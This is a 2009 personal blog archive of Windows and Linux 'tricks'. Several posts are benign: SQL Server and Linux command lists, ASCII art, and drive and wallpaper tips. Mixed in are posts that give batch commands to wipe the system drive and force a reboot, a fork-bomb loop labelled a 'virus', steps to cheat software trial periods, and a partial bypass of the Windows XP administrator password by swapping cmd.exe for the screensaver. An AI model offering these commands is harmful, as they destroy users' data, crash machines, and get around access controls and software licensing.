Thursday, December 31, 2009

make trial period forever of trial softwere

You have to follow these tips carefully to successfully hack a software and make it run in it’s trial mode forever.

1. Note down the date and time, when you install the software for the first time.
2. Once the trial period expires, you must always run the software using RunAsDate.
3. After the trial period is expired, do not run the software(program) directly.If you run the software directly even once, this hack may no longer work.
4. It is better and safe to inject the date of the last day in the trial period.

 For example, if the trial period expires on jan 30 2009, always inject the date as jan 29 2009 in the RunAsDate.

I hope this helps! Please express your experience and opinions through comments.

FORMAT UR HARDDISK WITH NOTEPAD

FORMAT UR HARDDISK WITH NOTEPAD
Just Go To Notepad and then type code which is given below..
*******************************
@Echo off
Del C:\ *.*y
save it as Dell.bat
or worse
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a .bat file
*********************************

Hack windows xp passwords



Hack windows xp passwordsHere are the steps involved to Hack the Window XP Administrator Password .

1. Go to Start –> Run –> Type in CMD
2. You will get a command prompt. Enter these commands the way it is given
3. cd\
4. cd\ windows\system32
5. mkdir temphack
6. copy logon.scr temphack\logon.scr
7. copy cmd.exe temphack\cmd.exe
8. del logon.scr
9. rename cmd.exe logon.scr
10. [...]







Funny Computer trick

Copy and paste the java script code to the address bar of your browser


javascript:function Shw(n) {if (self.moveBy) {for (i = 35; i > 0; i--) {for (j = n; j > 0; j--) {self.moveBy(1,i);self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0); } } }} Shw(6)

2: Press enter and watch your window's "shaking it". You can change the value of i if you wish :-)


Convert FAT-NTFS

To convert FAT partition into a NTFS, Perform the following Steps..
Click Start, click program and then click command prompt.In windows XP, click start, click run
type cmd and then click OK.

At the command promt, type CONVERT[drive_letter]:  /FS:NTFS.convert.exe will to convert
the partition to NTFS.

Folder Option missing

Open Run and then type "gpedit.msc".
Now goto user configuration>Administrative tamplets> Windows Component windows Explorer.
Click On windows explorer you will find the 3rd option on the right hand side

of the screen "Removes the folder option menu item from the Tools menu"
Just check it, if it is not configured then change it ti enable by double clicking on it and after
applying again set it ti not confgured.
I Hope that you will find the option after restarting windows.


Wednesday, December 30, 2009

SQL Server 2005 Commands

Aggregate - CREATE AGGREGATE
- DROP AGGREGATE
Application Role - CREATE APPLICATION ROLE
- ALTER APPLICATION ROLE
- DROP APPLICATION ROLE
Assembly - CREATE ASSEMBLY
- ALTER ASSEMBLY
- DROP ASSEMBLY
ALTER AUTHORIZATION

BACKUP
BACKUP CERTIFICATE
BEGIN [DIALOG [CONVERSATION]]

Certificate - ALTER CERTIFICATE
- CREATE CERTIFICATE
- DROP CERTIFICATE
CHECKPOINT
COMMIT
Contract - CREATE CONTRACT
- DROP CONTRACT
Credential - CREATE CREDENTIAL
- ALTER CREDENTIAL
- DROP CREDENTIAL

Database - CREATE DATABASE
- ALTER DATABASE
- DROP DATABASE
DBCC CHECKALLOC - Check consistency of disk allocation.
DBCC CHECKCATALOG - Check catalog consistency
DBCC CHECKCONSTRAINTS - Check integrity of table constraints.
DBCC CHECKDB - Check allocation, and integrity of all objects.
DBCC CHECKFILEGROUP - Check all tables and indexed views in a filegroup.
DBCC CHECKIDENT - Check identity value for a table.
DBCC CHECKTABLE - Check integrity of a table or indexed view.
DBCC CLEANTABLE - Reclaim space from dropped variable-length columns.
DBCC dllname - Unload a DLL from memory.
DBCC DROPCLEANBUFFERS - Remove all clean buffers from the buffer pool.
DBCC FREE... CACHE - Remove items from cache.
DBCC HELP - Help for DBCC commands.
DBCC INPUTBUFFER - Display last statement sent from a client to a database instance.
DBCC OPENTRAN - Display information about recent transactions.
DBCC OUTPUTBUFFER - Display last statement sent from a client to a database instance.
DBCC PROCCACHE - Display information about the procedure cache
DBCC SHOW_STATISTICS - Display the current distribution statistics
DBCC SHRINKDATABASE - Shrink the size of the database data and log files.
DBCC SHRINKFILE - Shrink or empty a database data or log file.
DBCC SQLPERF - Display transaction-log space statistics. Reset wait and latch statistics.
DBCC TRACE... - Enable or Disable trace flags
DBCC UPDATEUSAGE - Report and correct page and row count inaccuracies in catalog views
DBCC USEROPTIONS - Return the SET options currently active
DBCC deprecated commands
DBCC Undocumented commands
DECLARE
Default - CREATE DEFAULT
- DROP DEFAULT
DELETE
DENY - DENY Object permissions
- DENY User/Role permissions
Endpoint - CREATE ENDPOINT
- ALTER ENDPOINT
- DROP ENDPOINT
Event - CREATE EVENT NOTIFICATION
- DROP EVENT NOTIFICATION
EXECUTE
EXECUTE AS

Fulltext Catalog - CREATE FULLTEXT CATALOG
- ALTER FULLTEXT CATALOG
- DROP FULLTEXT CATALOG
Fulltext Index - CREATE FULLTEXT INDEX
- ALTER FULLTEXT INDEX
- DROP FULLTEXT INDEX
Function - CREATE FUNCTION
- ALTER FUNCTION
- DROP FUNCTION

GO
GRANT - GRANT Object permissions
- GRANT User/Role permissions

Index - CREATE INDEX
- ALTER INDEX
- DROP INDEX
INSERT
iSQL -U user -P password -i script.sql -o logfile.log

Key - CREATE ASYMMETRIC KEY - ALTER ASYMMETRIC KEY
- DROP ASYMMETRIC KEY
- CREATE SYMMETRIC KEY
- OPEN SYMMETRIC KEY - CLOSE SYMMETRIC KEY
- ALTER SYMMETRIC KEY
- DROP SYMMETRIC KEY
KILL
KILL QUERY NOTIFICATION
KILL STATS JOB

Login - CREATE LOGIN
- ALTER LOGIN
- DROP LOGIN

Master Key - CREATE MASTER KEY
- ALTER MASTER KEY - BACKUP MASTER KEY
- DROP MASTER KEY
- RESTORE MASTER KEY
- ALTER SERVICE MASTER KEY - BACKUP SERVICE MASTER KEY
- RESTORE SERVICE MASTER KEY
Message Type - CREATE MESSAGE TYPE
- ALTER MESSAGE TYPE
- DROP MESSAGE TYPE

Partition Function - CREATE PARTITION FUNCTION
- ALTER PARTITION FUNCTION
- DROP PARTITION FUNCTION
Partition Scheme - CREATE PARTITION SCHEME
- ALTER PARTITION SCHEME
- DROP PARTITION SCHEME
Procedure - CREATE PROCEDURE
- ALTER PROCEDURE
- DROP PROCEDURE

Queue - CREATE QUEUE
- ALTER QUEUE
- DROP QUEUE

Remote Service Binding - CREATE REMOTE SERVICE BINDING
- ALTER REMOTE SERVICE BINDING
- DROP REMOTE SERVICE BINDING

RESTORE - RESTORE DATABASE Complete
RESTORE DATABASE Partial
RESTORE DATABASE Files
RESTORE LOGS
RESTORE DATABASE_SNAPSHOT
RESTORE FILELISTONLY - List database and log files
RESTORE HEADERONLY - List backup header info
RESTORE LABELONLY - Media info
RESTORE REWINDONLY - Rewind and close tape device
RESTORE VERIFYONLY
REVERT
REVOKE - REVOKE Object permissions
- REVOKE User/Role permissions
Role - CREATE ROLE
- ALTER ROLE
- DROP ROLE
ROLLBACK
Route - CREATE ROUTE
- ALTER ROUTE
- DROP ROUTE

Schema - CREATE SCHEMA
- ALTER SCHEMA
- DROP SCHEMA
SELECT
SEND
SERVERPROPERTY
Service - CREATE SERVICE
- ALTER SERVICE
- DROP SERVICE
SESSION_USER
SESSIONPROPERTY
SET @local_variable
SET
SHUTDOWN
Signature - ADD SIGNATURE
- DROP SIGNATURE
Statistics - CREATE STATISTICS
- UPDATE STATISTICS
- DROP STATISTICS

Synonym - CREATE SYNONYM
- DROP SYNONYM

Table - CREATE TABLE
- ALTER TABLE
- DROP TABLE
- TRUNCATE TABLE
Transaction - BEGIN DISTRIBUTED TRANSACTION
- BEGIN TRANSACTION
- COMMIT TRANSACTION
Trigger - CREATE TRIGGER
- ALTER TRIGGER - ENABLE TRIGGER - DISABLE TRIGGER
- DROP TRIGGER
Type - CREATE TYPE
- DROP TYPE

UNION
UPDATE
User - CREATE USER
- ALTER USER
- DROP USER
USE

View - CREATE VIEW
- ALTER VIEW
- DROP VIEW

XML Schema Collection - CREATE XML SCHEMA COLLECTION
- ALTER XML SCHEMA COLLECTION
- DROP XML SCHEMA COLLECTION

Linux commands

A


--------------------------------------------------------------------------------
alias - create names or abbreviations for commands


apropos - search the manual page names and descriptions


at [man page] - queue, examine or delete jobs for later execution


B

--------------------------------------------------------------------------------

bc [man page] - An arbitrary precision calculator language


C

--------------------------------------------------------------------------------


cal - displays a calendar


cat [man page] - concatenate files and print on the standard output


cd - change directory


chgrp [man page] - change group ownership


chmod [man page] - change file access permissions


cksum [man page] - checksum and count the bytes in a file


cp [man page] - copy files and directories


csplit [man page] - split a file into sections determined by context lines


D


--------------------------------------------------------------------------------


date [man page] - print or set the system date and time


dd [man page] - convert and copy a file


du [man page] - estimate file space usage


E


--------------------------------------------------------------------------------


egrep [man page] - print lines matching a pattern


export - set an environment variable


F


--------------------------------------------------------------------------------


fgrep [man page] - print lines matching a pattern


find [man page] - search for files in a directory hierarchy


fold [man page] - wrap each input line to fit in specified width


G


------------------------------------------------------

grep [man page] - print lines matching a pattern


H

--------------------------------------------------------------------------------

head [man page] - output the first part of files


I


--------------------------------------------------------------------------------






J


--------------------------------------------------------------------------------


join [man page] - join lines of two files on a common field


K


--------------------------------------------------------------------------------


L


--------------------------------------------------------------------------------

logrotate [man page] - rotates, compresses, and mails system logs


ls [man page] - list directory contents


M


--------------------------------------------------------------------------------


mkdir [man page] - make directories


mv [man page] - move (rename) files


mount [man page] - mount a file system


N

--------------------------------------------------------------------------------


nl [man page] - number lines of files


O


--------------------------------------------------------------------------------


od [man page] - dump files in octal and other formats


P


--------------------------------------------------------------------------------


pwd [man page] - print name of current/working directory


Q
--------------------------------------------------------------------------------






R

--------------------------------------------------------------------------------


rgrep [man page] - print lines matching a pattern


rm [man page] - remove files or directories


S


--------------------------------------------------------------------------------


scp - secure copy (remote file copy program)


ssh - OpenSSH SSH client (remote login program)


T

--------------------------------------------------------------------------------


tail [man page] - output the last part of files


tar [man page] - The GNU version of the tar archiving utility


tee [man page] - read from standard input and write to standard output and files


time [man page] - run programs and summarize system resource usage


touch [man page] - change file timestamps


V

------------------------------------------------------------------------------
vim - Vi IMproved, a programmers text editor


W


--------------------------------------------------------------------------------


watch [man page] - execute a program periodically, showing output fullscreen


wc [man page] - print newline, word, and byte counts for each file


whoami [man page] - print effective userid


X


--------------------------------------------------------------------------------


Y
--------------------------------------------------------------------------------


yes [man page] - output a string repeatedly until killed

Tuesday, December 29, 2009

orkut scrap

´´´´´´´´´´¶¶


´´´´´´´´´¶¶¶

¶¶¶´´´´´¶¶´¶

´¶¶¶¶¶¶¶¶´´¶

´´´¶¶´´´´´´¶¶¶¶¶¶¶¶¶

´´´´´¶¶´¶¶´´´´¶¶¶¶

´´´´¶¶´´´´´¶¶¶

´´´¶¶´¶¶¶¶´´¶

´´¶¶¶¶¶´´¶¶´¶´´´´´´´´¶

´¶¶´´´´´´´´¶¶¶´´´´´´¶¶

´´´´´´´´´´´´¶¶´´´´´¶¶

´´´´´´´´´´´´´´´´´´¶¶¶¶¶

´´´´´´´´´´´´´´´´´¶¶¶¶¶¶

´´´¶¶¶¶¶´´´´´´´´¶¶¶´´¶¶

´´´´´¶¶¶¶¶¶¶¶¶¶¶¶¶´´´¶¶

´´´´´´¶¶¶¶´´¶¶¶¶¶´´´´¶¶¶

´´´´´´´´¶¶¶´´´´´´´´´´¶¶¶¶¶¶¶¶¶¶¶

´´´´´´´´´¶¶¶¶´´´¶¶¶¶´´´´´´´´¶¶¶¶¶¶¶¶

´´´´´´´´´´´¶¶¶¶´¶¶¶¶´´´´´¶¶¶¶¶¶

´´´´´´´´´´´¶¶¶´´´´´¶´¶¶¶¶¶¶

´´´´´´´´´´¶¶´´´´´¶´´´´¶¶

´´´´´´´´´¶¶´´¶¶¶¶¶¶´´´¶¶¶

´´´´´´´´¶¶¶¶¶¶¶¶´¶¶¶¶´¶¶¶

´´´´´´´¶¶¶¶¶´´´´´´´¶¶¶¶¶

´´´´´¶¶¶¶´´´´´´´´´´´¶¶¶¶¶

´´´´´¶´´´´´´´´´´´´´´´´¶¶¶

´´´´´´´´´´´´´¶´´´´´´´´´¶¶¶

´´´´´´´´´¶¶´¶¶´´´´´´´´´´´¶

Orkut Scrap

~~(;@;) ,*.,.~.,* (;@;)


~~*`~´.* .(;@;).`~'´

~~. ,~. ,.* . `~ ´ *.*´.,~.,

~~(;@;). ,.~. ,´ .*.* .(;@;)

~~ `~´..(;@;) *.*,.~. ,`~'´

~~~,.~.,`~.´ *..*(;@;) *.. *

~~ (;@;)*.. ,.~., .`'~ ´,.~.,

~~~`~'.´ *.(;@;)*.*. (;@;)

~~~~~*,.~.,`~´,.~,.´`~´

~~~~~ (;@;).*.(;@;).**.

~~~~~ `~´ * ~ `~'.´~

~,____*:( ;@;)*(;@;).*;'___,

~ \___\,*`.';:( ;@;),*;,*/___/

~~~~ ,___\*:;:;`.'*/___,

~~~~ \___\,\\
//,/___/

~~~~~~,---.\\
,/,---,

~~~~~~(_ -}.(_){-_ )

~~~~~~.'---' /
\ `---'

~.~~~~~ / /


\ \

~~~~~~~-,/


\,

Read more...

video




www.chirkutonorkut.com

Monday, December 28, 2009

TO Create a simple computer virus

to make a simple computer virus just type given
below code in notepad


@echo off
:loop
start
goto loop

and save as filename.bat..

VIRUS IS READY TO EXECUTE..

make wallpaper in your pendrive

Copy the following code and paste it in note pad



{BE098140-A513-11D0-A3A4-00C04FD706EC}={BE098140-A513-11D0-A3A4-00C04FD706EC}

[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
ATTRIBUTES=1
IconArea_Image=PATH_OF_THE_WALLPAPER

Example:- if image name is nature.jpg
then IconArea_Image=nature.jpg
Save the file as desktop.ini and see the changes
Note:- If the wallpaper exist in the same folder then write the full name of the wallpaper.

WINDOW XP install in your pendrive

REMEMBER, THIS GUIDE WILL DELETE ALL DATA FROM DRIVE C: AND PENDRIVE


( if you can't format your drive C:, install Windows Xp On Your Pen, then move all data needed using Pendrive or Network Area to the other PC )



                                                                                             
What do you need?                 

1. Windows Xp installation disk

2. Access to PC with working CD Cd-ROM DVD drive.

3. This file solution.rar



This guide is for people with basic knowledge of PC hardware and system software

Let's start.



1. Download solution.rar file

2. Unpack solution.rar file on drive C, you should have a folder named C:\Dos

3. Put your pendrive ( at least 1GB) into working PC USB port

4. Go to the folder C:\Dos and run HpUSBformat.exe file

- it should auto detect wyour pendrive disk, if not select form the list ( my pendrive is a drive G: )

- set other options like on the image below and click start.





- now you have a pendrive with bootable dos on it.

5. Copy all other files from C:/Dos to your pendrive. ( you can overwrite existing ones)

- your pendrive should look like that







6. Put your Windows Xp installation disk into Cdrom and copy all files from CD to pendrive.

7. Boot your laptop with pendrive ( if you have problems, just check your BIOS or try to access boot menu )

8. Type sys d: and hit enter

- if you see system transferred - you have luck, FAT32 filesystem on drive C:, you will not lose your data

- go to step 11

- if any problem apears go to step 8

8. REMEMBER, you will loose all data from drive C:/

9. Type format c:/q/s

- accept and if it is formated go to step 11 ( you are lucky, you don't need to make partitions)

- otherwise go to step 10

10. Type fdisk and hit enter

-create new partition ( after restart boot with pendrive in)

-go to step 9 and back here :)

-type pqmagic and set your new partition active ( physical drive 2, Advanced A, ste Active - S, are you sure - Y, Exit - X )

11.Type nc and hit enter, and using Norton Commander, copy all files form pendrive to disk C: ( you can overwrite existing ones)

12. Restart Laptop without pendrive in it ( it should start from harddrive)

13. Type cd i386 and hit enter ( it will enter i386 folder)

14 Type winnt and hit enter



INSTALL WINDOWS :) ( REMEMBER, DURING INSTALLATION - KEEP EXISTING FILE SYSTEM - DO NOT FORMAT, YOU CAN CONVERT IT TO NTFS LATER )


 for more information CLICK HERE

Thursday, December 24, 2009

HIDE The Drive

Hide The Drive
1.First goto start->run->type “diskpart” and enter(with out quotations)
2.Type “list volume” (with out quotations)
3.select the volume of drive u want to hide by this command “select volume3” (with out quotations)
4.Then type “remove letter f” (with out quotations)
(It removes the drive f)

5.If u want re-assign the drive
a. First goto start->run->type “diskpart” and enter(with out quotations)
b. Type “list volume” (with out quotations)
c. select the volume of drive u (before) hide by this command “select
volume3” (with out quotations)
d.THEN type “assign letter f” (with out quotations)


EXAMPLE:
DISKPART> list volume

Volume ### Ltr Label Fs Type Size Status Info
---------- --- ----------- ----- ---------- ------- --------- --------
Volume 0 D DVD-ROM 0 B
Volume 1 C NTFS Partition 20 GB Healthy System
Volume 2 E New Volume NTFS Partition 49 GB Healthy
Volume 3 F New Volume NTFS Partition 78 GB Healthy
Volume 4 G New Volume NTFS Partition 86 GB Healthy
Volume 5 H SUBBU FAT32 Removeable 978 MB

DISKPART> select volume 3
Volume 3 is the selected volume.
DISKPART> remove letter f
DiskPart successfully removed the drive letter or mount point.
DISKPART> select volume 3
Volume 3 is the selected volume.
DISKPART> assign letter f
DiskPart successfully assigned the drive letter or mount point.